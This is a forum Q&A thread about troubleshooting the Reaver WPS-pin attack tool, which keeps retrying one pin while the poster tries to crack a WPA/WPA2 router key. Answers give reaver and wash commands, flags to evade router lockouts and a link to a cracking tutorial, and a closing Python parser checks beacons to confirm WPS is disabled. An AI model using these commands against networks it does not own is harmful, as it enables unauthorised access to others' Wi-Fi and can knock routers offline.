
This question is for anyone who has tried or succeeded to crack WiFi WPA/WPA2 keys with BackTrack Linux and Reaver. So, I wanted to test it on my WiFi router. I started everything as described here. But I got this error:

root@bt:~# reaver -i mon0 -b 74:31:70:05:4B:A7 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 74:31:70:05:4B:A7
[+] Switching mon0 to channel 1
[+] Associated with 74:31:70:05:4B:A7 (ESSID: ALICE-WLAN20)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save

It tries the same pin over and over, can anyone explain to me what the problem is, and how I can fix it?

S.L. Barth
faikabd
  • Not a security question, but a support question for Reaver. (Which appears to be answered in their FAQ: "**Reaver just tries the same pin over and over** Make sure your target AP supports WPS. Run the walsh tool to scan for WPS-enabled APs and make sure your target AP is listed.") – Graham Hill May 14 '12 at 09:40
  • -N did it for me. Also: -d 5 will wait 5 seconds between pin attempts. -r 5:10 will sleep for 10 seconds after every 5 attempts. This lets the router cool off between pin attempts. –  Aug 25 '15 at 16:06

2 Answers

First make sure that reaver is up to date (using apt-get update && apt-get upgrade will do this for you).

Second, remember this is an exploit tool. I have had mixed results. Certain Linksys routers will crap out under the load and simply lock up. Some other models have given me the same behavior yours is showing (repeated pin, or repeated series of pins even when WPS is enabled).

This tool will not work on every router. Try it on a few different targets. If you get the same issue against multiple models it could be your WiFi card or driver as well.

From my experience reaver works on maybe 60-70% of WPS enabled routers I come across. The other 30-40% either get DoS'd or simply fail.

Chris Frazier
  • Very good answer. It should be said if the tool fails and it is because the router crashes, it is because of the router's WPS support being implemented the incorrect way, which might or might not be solvable by firmware. I know when this issue the only solution that to solve the exploit in WPS is to disable WPS the exploit itself is a design flaw in WPS. – Ramhound May 15 '12 at 16:54

First make sure the router has WPS by running this command "wash -i mon0" (without quotes; for best results use an rtl8187 wireless card).

Try running reaver -i mon0 -b 74:31:70:05:4B:A7 -vv -N -S -c1 (1 is your channel)

Also try to get a good signal; that was my case. I cracked a TP-Link router in almost 12 hours (WPA2-PSK) using the same as you did, and as mentioned before, you might have to wait for like 5 minutes or so as the router might block your WPS requests for a period of time. You can also try wpscrack; I didn't try it but it could help you.

http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/

Good Luck

mhmdkh
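
An added example, not part of the original thread and not code from Reaver or wash: a parser for the WPS information element in a beacon's tagged parameters, which is where an AP advertises WPS and its "AP Setup Locked" flag, so you can confirm that WPS is really off on your own router after disabling it. The frames below are constructed bytes and the helper names are hypothetical.

```python
import struct

WPS_OUI_TYPE = bytes.fromhex("0050f204")        # vendor IE: OUI 00:50:F2, type 4 = WPS
ATTR_VERSION, ATTR_STATE, ATTR_LOCKED = 0x104A, 0x1044, 0x1057

def iter_tlv(buf, hdr):
    """Yield (type, value) pairs; hdr is the struct format of the type/length header."""
    size, off = struct.calcsize(hdr), 0
    while off + size <= len(buf):
        t, length = struct.unpack_from(hdr, buf, off)
        off += size
        if off + length > len(buf):
            raise ValueError("truncated element")
        yield t, buf[off:off + length]
        off += length

def wps_status(tagged_params: bytes) -> dict:
    """Summarise what a beacon's tagged parameters say about WPS."""
    status = {"wps": False, "configured": None, "locked": False}
    for tag, body in iter_tlv(tagged_params, "BB"):      # 802.11 IE: 1-byte id, 1-byte len
        if tag != 221 or not body.startswith(WPS_OUI_TYPE):
            continue                                     # not the WPS vendor element
        status["wps"] = True
        for attr_id, val in iter_tlv(body[4:], ">HH"):   # WPS attr: 2-byte id, 2-byte len
            if attr_id == ATTR_STATE and val:
                status["configured"] = val[0] == 2       # 1 = not configured, 2 = configured
            elif attr_id == ATTR_LOCKED and val:
                status["locked"] = val[0] == 1           # AP is refusing external registrars
    return status

# Constructed sample data (not captured from any real network).
def ie(tag, body):
    return bytes([tag, len(body)]) + body
def wsc_attr(attr_id, val):
    return struct.pack(">HH", attr_id, len(val)) + val

SSID = ie(0, b"EXAMPLE-AP")
_BASE = WPS_OUI_TYPE + wsc_attr(ATTR_VERSION, b"\x10") + wsc_attr(ATTR_STATE, b"\x02")
WPS_ON = SSID + ie(221, _BASE)
WPS_LOCKED = SSID + ie(221, _BASE + wsc_attr(ATTR_LOCKED, b"\x01"))
WPA_ONLY = SSID + ie(221, bytes.fromhex("0050f201") + b"\x01\x00")  # WPA element, no WPS

if __name__ == "__main__":
    for name, frame in [("wps on", WPS_ON), ("locked", WPS_LOCKED), ("wps off", WPA_ONLY)]:
        print(name, wps_status(frame))
```

An AP whose beacons still report `wps: True` after WPS was turned off in its admin interface has not actually disabled it.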